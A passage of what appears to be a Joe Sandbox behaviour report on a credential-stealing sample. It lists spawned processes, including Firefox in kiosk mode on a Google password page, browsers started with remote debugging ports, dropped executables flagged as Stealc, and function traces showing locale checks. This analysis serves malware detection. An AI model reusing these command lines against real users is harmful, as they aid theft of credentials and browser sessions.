Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:32:41
Start date:	04/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:32:41
Start date:	04/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:32:41
Start date:	04/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:32:41
Start date:	04/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:32:41
Start date:	04/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:32:42
Start date:	04/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2180 -parentBuildID 20230927232528 -prefsHandle 2116 -prefMapHandle 2100 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8757b89c-e953-4ab1-960f-4c48d4b5d735} 3276 "\\.\pipe\gecko-crash-server-pipe.3276" 1b625d6df10 socket
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:32:43
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe"
Imagebase:	0xb10000
File size:	2'124'288 bytes
MD5 hash:	C31A9B8F636DD5219331381E6120A997
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000021.00000003.3110291684.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	11:32:44
Start date:	04/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2344,i,6944280145687468448,6337840555587175668,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:32:47
Start date:	04/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4432 -parentBuildID 20230927232528 -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b74bb88-0790-41f2-9d81-5248e5eb58ba} 3276 "\\.\pipe\gecko-crash-server-pipe.3276" 1b638209e10 rdd
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:32:49
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe"
Imagebase:	0xa40000
File size:	2'795'520 bytes
MD5 hash:	178EC03D4F5F0C710E24F5F463993FE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:32:52
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe"
Imagebase:	0xcc0000
File size:	919'552 bytes
MD5 hash:	40AD6330DCB8BBFDE0F879223B84D0E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	11:32:52
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xd40000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	11:32:52
Start date:	04/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:32:55
Start date:	04/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	11:32:57
Start date:	04/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	11:32:57
Start date:	04/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2660,i,4893309152758529203,13133286740846898616,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	11:32:57
Start date:	04/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2824 --field-trial-handle=2076,i,3800076312962857539,4475748106252003537,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	11:33:01
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe"
Imagebase:	0x8a0000
File size:	2'977'792 bytes
MD5 hash:	00280DC5049562D147E25FE7E545007C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002E.00000003.3563789245.0000000001199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002E.00000003.3401961515.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002E.00000003.3404778297.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002E.00000003.3562637684.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	772
Total number of Limit Nodes:	16

Executed Functions

Function 008F652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,008F652A,?,?,?,?,?,008F7661), ref: 008F6567

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 45817b82d0cf14bc9ffe0d025c61af17a2393e153ee7b5535563c6164e4f6053
Instruction ID: a3cf87a1c616c4bf6afd310f85fbfb3b1bac546ed828baccd362827c327efc39
Opcode Fuzzy Hash: 45817b82d0cf14bc9ffe0d025c61af17a2393e153ee7b5535563c6164e4f6053
Instruction Fuzzy Hash: 7CE08C3050150CAECF297B68C84E9683B29FF55759F104914FA0896226DB25ED92CA81

Function 053708D0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221552321.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5370000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6409f175d2ba93857ff39fd859a59b49b709ec157fa93dea41ac01a8a02824d
Instruction ID: fb618a889e14ba5067f853b53bafe1b35fc4b14a4593f5c28d8d35ea72d81aa3
Opcode Fuzzy Hash: f6409f175d2ba93857ff39fd859a59b49b709ec157fa93dea41ac01a8a02824d
Instruction Fuzzy Hash: 4E01BCE798C118FE716AC142675C9BBAB6FA2C76307308526F403C6E12D2DC0E582D32

Function 008C5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 008C612B
00000423, xrefs: 008C60FA
00000422, xrefs: 008C60C9
00000419, xrefs: 008C6098
Keyboard Layout\Preload, xrefs: 008C6054

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: c73384bead66ec4ece13a13c583437485ee95184d130371c7d8115c0083071da
Instruction ID: 9b8f85c3f61d19ad83043b777ec7efcaedd39012408fc5acb670e2c12485412e
Opcode Fuzzy Hash: c73384bead66ec4ece13a13c583437485ee95184d130371c7d8115c0083071da
Instruction Fuzzy Hash: 28F1C170A0025C9BDF24DF68CC84BDEBBB9FB45304F5046A9E508E72C1DB74AA94CB95

Function 008C9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
